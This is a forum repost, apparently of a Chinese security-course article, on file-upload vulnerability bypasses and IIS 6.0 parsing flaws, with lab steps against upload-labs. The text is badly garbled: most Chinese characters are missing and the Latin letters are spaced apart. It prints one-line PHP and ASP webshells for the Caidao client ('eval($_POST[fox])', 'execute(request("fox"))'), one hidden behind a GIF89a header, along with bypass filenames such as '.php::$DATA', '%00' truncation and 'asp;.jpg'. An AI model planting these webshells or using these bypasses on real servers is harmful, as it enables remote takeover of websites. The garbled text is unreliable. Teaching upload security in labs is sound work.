搜索

[21541] 2020-12-26_[网络安全]十三.文件上传漏洞(2)常用绕过方法及IIS6.0解析漏洞

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-12-26_[网络安全]十三.文件上传漏洞(2)常用绕过方法及IIS6.0解析漏洞 [ ]   .   ( 2 ) I I S 6 . 0 E a s t m o u n t   L e m o n S e c   2 0 2 0 - 1 2 - 2 6 [ ]   . W e b [ ]   . W e b C D N [ ]   . I P [ ]   . S Q L S Q L M A P [ ]   . X S S - 1 [ ]   . X S S - 2 [ ]   . B u r p   S u i t e P r o x y [ ]   . W e b Z e N m a p T h r e a t S c a n D i r B u s t e r [ ]   . W i r e s h a r k - 1 [ ]   . W i r e s h a r k A R P M A C - 2 [ ]   . S h o d a n P y t h o n [ ]   .   ( 1 ) C a i d a o 广 1 0 0 W e b C a i d a o I I S 6 . 0 P H P 3 4 5 W i n d o w s   : : $ D A T A A p a c h e C a i d a o F o x A I P y t h o n W e b C V E
绿 -   h t t p s : / / g i t h u b . c o m / e a s t m o u n t y x z / N e t w o r k S e c u r i t y S e l f - s t u d y . 1 . P H P 3 4 5 2 . W i n d o w s   : : $ D A T A 3 . A p a c h e . . % 0 0 . I I S 6 . 0   . C a i d a o J S M I M E h t a c c e s s F o x u p l o a d - l a b s 1 . P H P 3 4 5 P H P 3 P H P 3 P H P 3 P H P 5 f o x . p h p 5 2 . W i n d o w s   : : $ D A T A
W i n d o w s   : : $ D A T A W i n d o w s W i n d o w s N T F S N T F S D A T A a . p h p a . p h p a . p h p : l a k e 2 . p h p a . p h p : l a k e 2 . p h p : : $ D A T A a . p h p l a k e 2 . p h p : : $ D A T A f o x . p h p : : $ D A T A f o x . p h p 访 u p l o a d / f o x . p h p 3 . A p a c h e A p a c h e 1 . p h p . x x x A p a c h e x x x 1 . p h p f o x . p h p f o x . p h p . x x x U R L P H P f o x h t t p : / / 1 9 2 . 1 6 8 . 1 . 8 / f i l e _ u p l o a d / u p l o a d / f o x . p h p . x x x C a i d a o < ? p h p   e v a l ( $ _ P O S T [ f o x ] ) ;   ? >  
f o x . p h p . x x x . f o x . p h p 1 . j p g J P G P H P g i f p n g j p g g i f G I F 8 9 a < ? p h p   e v a l ( $ _ P O S T [ f o x ] ) ;   ? >  
B u r p S u i t e . p h p . % 0 0 0 x 0 0 A S C I I 0 0 0 g e t p o s t p h p . j p g B u r p S u i t e p h p . p h p % 0 0 1 . j p g p h p . p h p p o s t % 0 0 U R L F o r w a r d
% 0 0 . I I S 6 . 0   I S S 6 . 0 1 . * . a s p A S P 1 . a s p / 1 . j p g 1 . j p g a s p I I S 6 . 0 * . a s p   * . a s a I I S a s p v i d u n . a s p / v i d u n . a s p / 1 . j p g a s p 2 . * . a s p ; . j p g   ;     * . a s p 1 . a s p ; 1 . j p g a s p I I S 6 . 0   a s p . a s a . c e r * . c d x * . a s p ; . j p g I I S a s p v i d u n . a s p ; . j p g a s p I I S 6 . 0 A S P
a s p 1 . j p g a s p 1 . j p g G I F B u r p S u i t e S e n d   t o   R e p e a t e r u p f i l e / 1 . a s p ; < % e x e c u t e ( r e q u e s t ( " f o x " ) ) % >
访 C a i d a o f o x I I S 6 . 0 I I S 6 . 0 T X T u r l a s p a s p b u r p s u i t e P O S T a s p . t x t u p l o a d u p l o a d / w e b s h e l l . a s p a s p . t x t w e b s h e l l . a s p I I S a s p . t x t a s p
b u r p C a i d a o a s p w e b s h e l l . a s p ; . t x t a s p 使 . t x t I I S a s p C a i d a o I I S 6 . 0 C V E S Q L X S S
. L e m o n S e c
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理